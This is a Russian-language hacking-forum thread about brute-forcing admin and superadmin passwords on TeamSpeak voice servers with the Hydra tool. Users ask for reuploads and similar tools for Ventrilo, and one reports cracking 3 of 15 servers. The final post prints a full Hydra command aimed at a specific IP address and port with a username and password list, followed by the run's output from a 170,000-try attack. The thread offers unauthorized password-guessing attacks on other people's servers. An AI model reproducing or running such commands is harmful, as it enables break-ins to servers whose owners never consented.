Чаты Подбор пароля админа/суперадмина к голосовому чату TeamSpeak

Discussion in 'Веб-уязвимости' started by banned, 1 Jun 2007.

  1. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    TeamSpeak BruteForce using Hydra

    Довольно-таки рабочий брут пароля админа/суперадмина TeamSpeak сервера !!!

    Качать Hydra
    Видео о настройке
     
    1 person likes this.
  2. zooomer

    zooomer Banned

    Joined:
    17 Apr 2007
    Messages:
    11
    Likes Received:
    44
    Reputations:
    -14
    Перезалейте плиз гидру еще куднить....ошибкувыдаёт...заранее спасибо..
     
  3. YurSem

    YurSem Elder - Старейшина

    Joined:
    26 Aug 2007
    Messages:
    25
    Likes Received:
    10
    Reputations:
    0
    А для вентрило есть что-нибудь подобное?
     
  4. Molekular

    Molekular New Member

    Joined:
    11 Oct 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    На данный момент я пробовал брутить гидрой множество ТС. Из 15 пробрутилось только 3. Большинство пофиксили. Не могли бы вы выложить что-нибудь поновее. Заранее благодарю.
     
  5. DontWorryBeHappy

    DontWorryBeHappy New Member

    Joined:
    4 Mar 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Помогите пожалуйста уважаемые хакеры! Пытался сделать все как в описании в конечном итоге пишет это:

    Microsoft Windows XP [Версия 5.1.2600]
    (С) Корпорация Майкрософт, 1985-2001.
    C:\Documents and Settings\Андрей>cd "C:\Documents and Settings\Андрей\Рабочий стол\hydra"
    C:\Documents and Settings\Андрей\Рабочий стол\hydra>hydra
    Hydra v5.3 [http://www.thc.org] (c) 2006 by van Hauser / THC <[email protected]>
    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
    server service [OPT]

    Options:
    -R restore a previous aborted/crashed session
    -S connect via SSL
    -s PORT if the service is on a different default port, define it here
    -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
    -p PASS or -P FILE try password PASS, or load several passwords from FILE
    -e ns additional checks, "n" for null password, "s" try login as pass
    -C FILE colon seperated "login:pass" format, instead of -L/-P options
    -M FILE server list for parallel attacks, one entry per line
    -o FILE write found login/password pairs to FILE instead of stdout
    -f exit after the first found login/password pair (per host if -M)
    -t TASKS run TASKS number of connects in parallel (default: 16)
    -w TIME defines the max wait time in seconds for responses (default: 30)
    -v / -V verbose mode / show login+pass combination for each attempt
    server the target server (use either this OR the -M option)
    service the service to crack. Supported protocols: telnet ftp pop3[-ntlm]
    imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco
    cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener
    postgres nntp socks5
    rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhereteamspeak sip vmauthd
    OPT some service modules need special input (see README!)
    Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
    Hydra is a tool to guess/crack valid login/password pairs - use allowed only
    for legal purposes! If used commercially, tool name, version and web address
    must be mentioned in the report. Find the newest version at http://www.thc.org
    C:\Documents and Settings\Андрей\Рабочий стол\hydra>hydra -l skert -P "C:\Documents and Settings\Андрей\Рабочий стол\hydra\7.txt" -s 8767 -v 90.189.192.126 teamspeak

    WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
    Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
    Hydra (http://www.thc.org) starting at 2004-07-30 22:28:52
    [DATA] 16 tasks, 1 servers, 170636 login tries (l:1/p:170636), ~10664 tries per
    task
    [DATA] attacking service teamspeak on port 8767
    [VERBOSE] Resolving addresses ... done
    [STATUS] 14792.00 tries/min, 14792 tries in 00:01h, 155844 todo in 00:11h
    [STATUS] 14931.67 tries/min, 44795 tries in 00:03h, 125841 todo in 00:09h
    [VERBOSE] Writing restore file... done
    [STATUS] 14941.43 tries/min, 104590 tries in 00:07h, 66046 todo in 00:05h
    [VERBOSE] Writing restore file... done
    [STATUS] attack finished for 90.189.192.126 (waiting for childs to finish)
    Hydra (http://www.thc.org) finished at 2004-07-30 22:40:21

    [​IMG]
     
    #5 DontWorryBeHappy, 6 Mar 2009
    Last edited: 6 Mar 2009